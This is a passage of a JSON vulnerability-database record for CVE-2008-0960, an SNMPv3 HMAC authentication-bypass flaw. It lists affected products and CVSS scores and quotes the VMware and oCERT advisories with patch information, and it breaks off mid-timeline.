            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "firewalll",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.4"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.1.3"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "openview snmp emanate master agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "15"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "_id": null,
            "model": "ecos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ecoscentric",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "wireless lan controller module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "wireless lan control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "wireless lan control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "wireless lan control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "wireless lan control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "wireless lan control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.19"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.18"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.17"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.13"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.9"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.7"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "nx-os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9000"
          },
          {
            "_id": null,
            "model": "ios xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "application control engine module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.5.11"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.5.7"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.3.3"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2.7"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2.3.9"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2.1.7"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.15"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.13.7"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.11.6"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.9"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.17.6"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.5"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.3"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.11"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.9"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.7"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1.3"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2.0"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ace xml gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ace appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "message networking mn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "intuity audix r5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "_id": null,
            "model": "intuity audix lx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "intuity audix",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "interactive response",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "interactive response",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "emmc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.021"
          },
          {
            "_id": null,
            "model": "emmc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.017"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.5"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.3"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.3"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5"
          },
          {
            "_id": null,
            "model": "esx server patch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.510"
          },
          {
            "_id": null,
            "model": "net-snmp",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "net snmp",
            "version": "5.4.1.1"
          },
          {
            "_id": null,
            "model": "net-snmp",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "net snmp",
            "version": "5.3.2.1"
          },
          {
            "_id": null,
            "model": "net-snmp",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "net snmp",
            "version": "5.2.4.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.7.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.7.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.4"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.4"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#878044"
          },
          {
            "db": "BID",
            "id": "29623"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200806-140"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-0960"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Wes Hardaker",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200806-140"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2008-0960",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2008-0960",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-31085",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2008-0960",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#878044",
                "trust": 0.8,
                "value": "7.56"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200806-140",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-31085",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#878044"
          },
          {
            "db": "VULHUB",
            "id": "VHN-31085"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200806-140"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-0960"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "SNMPv3 HMAC verification in (1) Net-SNMP 5.2.x before 5.2.4.1, 5.3.x before 5.3.2.1, and 5.4.x before 5.4.1.1; (2) UCD-SNMP; (3) eCos; (4) Juniper Session and Resource Control (SRC) C-series 1.0.0 through 2.0.0; (5) NetApp (aka Network Appliance) Data ONTAP 7.3RC1 and 7.3RC2; (6) SNMP Research before 16.2; (7) multiple Cisco IOS, CatOS, ACE, and Nexus products; (8) Ingate Firewall 3.1.0 and later and SIParator 3.1.0 and later; (9) HP OpenView SNMP Emanate Master Agent 15.x; and possibly other products relies on the client to specify the HMAC length, which makes it easier for remote attackers to bypass SNMP authentication via a length value of 1, which only checks the first byte. A vulnerability in the way implementations of SNMPv3 handle specially crafted packets may allow authentication bypass. Net-SNMP is prone to a remote authentication-bypass vulnerability caused by a design error. \nSuccessfully exploiting this issue will allow attackers to gain unauthorized access to the affected application. \nNet-SNMP 5.4.1, 5.3.2, 5.2.4, and prior versions are vulnerable. Net-SNMP is a set of open source Simple Network Management Protocol (Simple Network Management Protocol) software. The software is used to monitor network equipment, computer equipment, UPS equipment, etc. Vulnerabilities exist in Net-SNMP\u0027s handling of authentication. SNMPv3 authentication is implemented using HMAC. An attacker could exploit this vulnerability to read and modify any SNMP object accessible using the authenticated credentials logged into the system. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2008-0017\nSynopsis:          Updated ESX packages for libxml2, ucd-snmp, libtiff\nIssue date:        2008-10-31\nUpdated on:        2008-10-31 (initial release of advisory)\nCVE numbers:       CVE-2008-3281 CVE-2008-0960 CVE-2008-2327\n- ------------------------------------------------------------------------\n\n1. Summary\n\n   Updated ESX packages for libxml2, ucd-snmp, libtiff. \n\n2. Relevant releases\n\n   ESX 3.0.3 without patch ESX303-200810503-SG\n   ESX 3.0.2 without patch ESX-1006968\n   ESX 2.5.5 before Upgrade Patch 10\n   ESX 2.5.4 before Upgrade Patch 21\n\n   NOTE: Extended support (Security and Bug fixes) for ESX 3.0.2 ended\n         on 2008-10-29. Extended support (Security and Bug fixes) for\n         ESX 2.5.4 ended on 2008-10-08. \n\n         Extended support for ESX 3.0.2 Update 1 ends on 2009-08-08. Users\n         should plan to upgrade to ESX 3.0.3 and preferably to the newest\n         release available. \n\n3. Problem Description\n\n a. Updated ESX Service Console package libxml2\n\n    A denial of service flaw was found in the way libxml2 processes\n    certain content. If an application that is linked against\n    libxml2 processes malformed XML content, the XML content might\n    cause the application to stop responding. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2008-3281 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted         any       any      not affected\n\n    ESXi           3.5       ESXi     not affected\n\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      ESX303-200810503-SG\n    ESX            3.0.2     ESX      ESX-1006968\n    ESX            2.5.5     ESX      ESX 2.5.5 upgrade patch 10 or later\n    ESX            2.5.4     ESX      ESX 2.5.4 upgrade patch 21\n\n    * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n b. Updated ESX Service Console package ucd-snmp\n\n    A flaw was found in the way ucd-snmp checks an SNMPv3 packet\u0027s\n    Keyed-Hash Message Authentication Code. An attacker could use\n    this flaw to spoof an authenticated SNMPv3 packet. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2008-0960 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted         any       any      not affected\n\n    ESXi           3.5       ESXi     not affected\n\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            3.0.2     ESX      not affected\n    ESX            2.5.5     ESX      ESX 2.5.5 upgrade patch 10 or later\n    ESX            2.5.4     ESX      ESX 2.5.4 upgrade patch 21\n\n    * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n c. Updated third party library libtiff\n\n    Multiple uses of uninitialized values were discovered in libtiff\u0027s\n    Lempel-Ziv-Welch (LZW) compression algorithm decoder. An attacker\n    could create a carefully crafted LZW-encoded TIFF file that would\n    cause an application linked with libtiff to crash or, possibly,\n    execute arbitrary code. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2008-2327 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted         any       any      not affected\n\n    ESXi           3.5       ESXi     not affected\n\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            3.0.2     ESX      not affected\n    ESX            2.5.5     ESX      ESX 2.5.5 upgrade patch 10 or later\n    ESX            2.5.4     ESX      ESX 2.5.4 upgrade patch 21\n\n    * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the md5sum of your downloaded file. \n\n   ESX\n   ---\n   ESX 3.0.3 patch ESX303-200810503-SG\n   http://download3.vmware.com/software/vi/ESX303-200810503-SG.zip\n   md5sum: e687313e58377be41f6e6b767dfbf268\n   http://kb.vmware.com/kb/1006971\n\n   ESX 3.0.2 patch ESX-1006968\n   http://download3.vmware.com/software/vi/ESX-1006968.tgz\n   md5sum: fc9e30cff6f03a209e6a275254fa6719\n   http://kb.vmware.com/kb/1006968\n\n   VMware ESX 2.5.5 Upgrade Patch 10\n   http://download3.vmware.com/software/esx/esx-2.5.5-119702-upgrade.tar.gz\n   md5sum: 2ee87cdd70b1ba84751e24c0bd8b4621\n   http://vmware.com/support/esx25/doc/esx-255-200810-patch.html\n\n   VMware ESX 2.5.4 Upgrade Patch 21\n   http://download3.vmware.com/software/esx/esx-2.5.4-119703-upgrade.tar.gz\n   md5sum: d791be525c604c852a03dd7df0eabf35\n   http://vmware.com/support/esx25/doc/esx-254-200810-patch.html\n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2327\n\n- ------------------------------------------------------------------------\n6. Change log\n\n2008-10-31  VMSA-2008-0017\nInitial security advisory after release of ESX 3.0.3, ESX 3.0.2, ESX\n2.5.5 and ESX 2.5.4 patches on 2008-10-30. \n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2008 VMware Inc.  All rights reserved. \n2008/06/09 #2008-006 multiple SNMP implementations HMAC authentication spoofing\n\nDescription:\n\nSome SNMP implementations include incomplete HMAC authentication code that\nallows spoofing of authenticated SNMPv3 packets. \n\nThe authentication code reads the length to be checked from sender input,\nthis allows the sender to supply single byte HMAC code and have a 1 in 256\nchance of matching the correct HMAC and authenticating, as only the first\nbyte will be checked. The sender would need to know a valid username. \n\nCurrently Net-SNMP and UCD-SNMP are known to be vulnerable, other SNMP\nimplementations may also be affected. The eCos project includes code derived\nfrom UCD-SNMP and is therefore also affected. \n\nAffected version:\n\nNet-SNMP \u003c= 5.4.1, \u003c= 5.3.2, \u003c= 5.2.4\nUCD-SNMP, all versions\neCos, all versions\n\nFixed version:\n\nNet-SNMP \u003e= 5.4.1.1, \u003e= 5.3.2.1, \u003e= 5.2.4.1\nUCD-SNMP, N/A\neCos, N/A\n\nCredit: this issue was reported by CERT/CC, it is tracked as VU#878044. \n\nCVE: CVE-2008-0960\n\nTimeline:\n2008-06-05: CERT/CC reports VU#878044 to oCERT requesting joint coordination\n2008-06-05: contacted 